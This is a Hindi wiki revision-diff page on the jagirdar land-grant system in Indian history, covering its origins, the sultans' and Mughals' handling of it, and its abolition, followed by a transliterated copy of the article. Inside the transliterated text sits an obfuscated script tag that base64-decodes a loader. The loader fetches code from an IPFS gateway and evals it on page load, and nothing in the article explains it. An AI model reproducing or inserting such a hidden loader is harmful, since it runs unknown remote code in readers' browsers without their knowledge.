Difference between revisions of "जागीरदार प्रथा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "कमजोर" to "कमज़ोर")
Line 4: Line 4:
 
'जागीरदार' [[फ़ारसी भाषा]] के शब्द 'जागीर', अर्थात भूमि और दार, अर्थात अधिकारी से मिलकर बना है। यह प्रथा भारत में मुस्लिमों के शासन काल में बहुत फली-फूली। इस समय यह प्रथा अधिकांश क्षेत्रों में व्याप्त थी और राज्य के शासन प्रबन्ध का महत्त्वपूर्ण हिस्सा थी। सशर्त जागीर में जागीरदार को शासन के हित में कर वसूलने और सेना संगठित करने जैसे जनकार्य करने पड़ते थे। भूमि, जो कि 'इकता' कहलाती थी, आमतौर पर जीवन भर के लिए दी जाती थी और अधिकारी की मृत्यु के बाद जागीर फिर से शासन के अधिकार में चली जाती थी। जागीरदार को उत्तराधिकारी निश्चित रकम अदा करके जागीर का नवीनीकरण कर सकता था। यह प्रथा [[दिल्ली]] के प्रारम्भिक सुल्तानों ने शुरू की थी।
 
'जागीरदार' [[फ़ारसी भाषा]] के शब्द 'जागीर', अर्थात भूमि और दार, अर्थात अधिकारी से मिलकर बना है। यह प्रथा भारत में मुस्लिमों के शासन काल में बहुत फली-फूली। इस समय यह प्रथा अधिकांश क्षेत्रों में व्याप्त थी और राज्य के शासन प्रबन्ध का महत्त्वपूर्ण हिस्सा थी। सशर्त जागीर में जागीरदार को शासन के हित में कर वसूलने और सेना संगठित करने जैसे जनकार्य करने पड़ते थे। भूमि, जो कि 'इकता' कहलाती थी, आमतौर पर जीवन भर के लिए दी जाती थी और अधिकारी की मृत्यु के बाद जागीर फिर से शासन के अधिकार में चली जाती थी। जागीरदार को उत्तराधिकारी निश्चित रकम अदा करके जागीर का नवीनीकरण कर सकता था। यह प्रथा [[दिल्ली]] के प्रारम्भिक सुल्तानों ने शुरू की थी।
 
====सामंतवादिता====
 
====सामंतवादिता====
सामन्तवादी चरित्र होने के कारण जागीरदार प्रथा से कुछ अर्द्ध स्वतंत्र सामन्त अस्तित्व में आए, जिससे केन्द्र सरकार कमजोर होने लगी। सुल्तान [[ग़यासुद्दीन बलबन]] ने इस प्रथा को कुछ हद तक नियंत्रित किया और सुल्तान [[अलाउद्दीन ख़िलजी]] ने इसे समाप्त कर दिया। बाद में इसे सुल्तान [[फ़िरोजशाह तुग़लक़]] ने दुबारा शुरू किया और उसके बाद यह प्रथा जारी रही। प्रारम्भिक [[मुग़ल]] शासकों (16वीं शताब्दी) ने अपने अधिकारियों को नक़द इनाम या वेतन देकर इसे समाप्त करना चाहा। लेकिन बाद के मुग़ल शासकों द्वारा इसे फिर से लागू करने के बाद उनका शासन कमजोर पड़ने लगा।
+
सामन्तवादी चरित्र होने के कारण जागीरदार प्रथा से कुछ अर्द्ध स्वतंत्र सामन्त अस्तित्व में आए, जिससे केन्द्र सरकार कमज़ोर होने लगी। सुल्तान [[ग़यासुद्दीन बलबन]] ने इस प्रथा को कुछ हद तक नियंत्रित किया और सुल्तान [[अलाउद्दीन ख़िलजी]] ने इसे समाप्त कर दिया। बाद में इसे सुल्तान [[फ़िरोजशाह तुग़लक़]] ने दुबारा शुरू किया और उसके बाद यह प्रथा जारी रही। प्रारम्भिक [[मुग़ल]] शासकों (16वीं शताब्दी) ने अपने अधिकारियों को नक़द इनाम या वेतन देकर इसे समाप्त करना चाहा। लेकिन बाद के मुग़ल शासकों द्वारा इसे फिर से लागू करने के बाद उनका शासन कमज़ोर पड़ने लगा।
 
==प्रथा की समाप्ति==
 
==प्रथा की समाप्ति==
 
वर्तमान [[तमिलनाडु]] राज्य के [[अर्काट]] के तत्कालीन नवाब मुहम्मद अली ने [[इंग्लैण्ड]] की [[ईस्ट इंडिया कम्पनी]] को '[[बंगाल की खाड़ी]]' के किनारे 190 किलोमीटर लम्बी और 75 किलोमीटर चौड़ी जागीर दी थी। बाद में यही 'मद्रास प्रेज़िडेंसी' का केन्द्र बनी। ब्रिटिश शासन काल में, विशेषकर [[महाराष्ट्र]] में, पुरानी जागीरदारी सम्पत्तियों को आमतौर पर व्यक्तिगत परिवारों की निजी सम्पत्ति मान लिया गया। स्वतंत्रता के बाद [[भारत]] में इस अनुपस्थित भू-स्वामित्व प्रणाली को समाप्त करने के लिए क़ानून बनाये गए।।
 
वर्तमान [[तमिलनाडु]] राज्य के [[अर्काट]] के तत्कालीन नवाब मुहम्मद अली ने [[इंग्लैण्ड]] की [[ईस्ट इंडिया कम्पनी]] को '[[बंगाल की खाड़ी]]' के किनारे 190 किलोमीटर लम्बी और 75 किलोमीटर चौड़ी जागीर दी थी। बाद में यही 'मद्रास प्रेज़िडेंसी' का केन्द्र बनी। ब्रिटिश शासन काल में, विशेषकर [[महाराष्ट्र]] में, पुरानी जागीरदारी सम्पत्तियों को आमतौर पर व्यक्तिगत परिवारों की निजी सम्पत्ति मान लिया गया। स्वतंत्रता के बाद [[भारत]] में इस अनुपस्थित भू-स्वामित्व प्रणाली को समाप्त करने के लिए क़ानून बनाये गए।।

Revision as of 13:00, 14 May 2013

jagiradar pratha bharat mean muslim shasan kal mean vikasit (13vian shatabdi ke prarambh mean) huee thi. yah bhoomi ki raiyatadari pranali thi, jisamean kisi bhoomi se lagan prapt karane aur usake prashasan ki zimmedari rajy ke ek adhikari ko di jati thi. kisi jagiradar ko jagir sauanpa jana sashart ya bina shart bhi ho sakata tha.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

pratha ka vikas

'jagiradar' farasi bhasha ke shabd 'jagir', arthat bhoomi aur dar, arthat adhikari se milakar bana hai. yah pratha bharat mean muslimoan ke shasan kal mean bahut phali-phooli. is samay yah pratha adhikaansh kshetroan mean vyapt thi aur rajy ke shasan prabandh ka mahattvapoorn hissa thi. sashart jagir mean jagiradar ko shasan ke hit mean kar vasoolane aur sena sangathit karane jaise janakary karane p date the. bhoomi, jo ki 'ikata' kahalati thi, amataur par jivan bhar ke lie di jati thi aur adhikari ki mrityu ke bad jagir phir se shasan ke adhikar mean chali jati thi. jagiradar ko uttaradhikari nishchit rakam ada karake jagir ka navinikaran kar sakata tha. yah pratha dilli ke prarambhik sultanoan ne shuroo ki thi.

samantavadita

samantavadi charitr hone ke karan jagiradar pratha se kuchh arddh svatantr samant astitv mean ae, jisase kendr sarakar kamazor hone lagi. sultan gayasuddin balaban ne is pratha ko kuchh had tak niyantrit kiya aur sultan alauddin khilaji ne ise samapt kar diya. bad mean ise sultan firojashah tugalaq ne dubara shuroo kiya aur usake bad yah pratha jari rahi. prarambhik mugal shasakoan (16vian shatabdi) ne apane adhikariyoan ko naqad inam ya vetan dekar ise samapt karana chaha. lekin bad ke mugal shasakoan dvara ise phir se lagoo karane ke bad unaka shasan kamazor p dane laga.

pratha ki samapti

vartaman tamilanadu rajy ke arkat ke tatkalin navab muhammad ali ne ianglaind ki eest iandiya kampani ko 'bangal ki kha di' ke kinare 190 kilomitar lambi aur 75 kilomitar chau di jagir di thi. bad mean yahi 'madras prezideansi' ka kendr bani. british shasan kal mean, visheshakar maharashtr mean, purani jagiradari sampattiyoan ko amataur par vyaktigat parivaroan ki niji sampatti man liya gaya. svatantrata ke bad bharat mean is anupasthit bhoo-svamitv pranali ko samapt karane ke lie qanoon banaye ge..


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh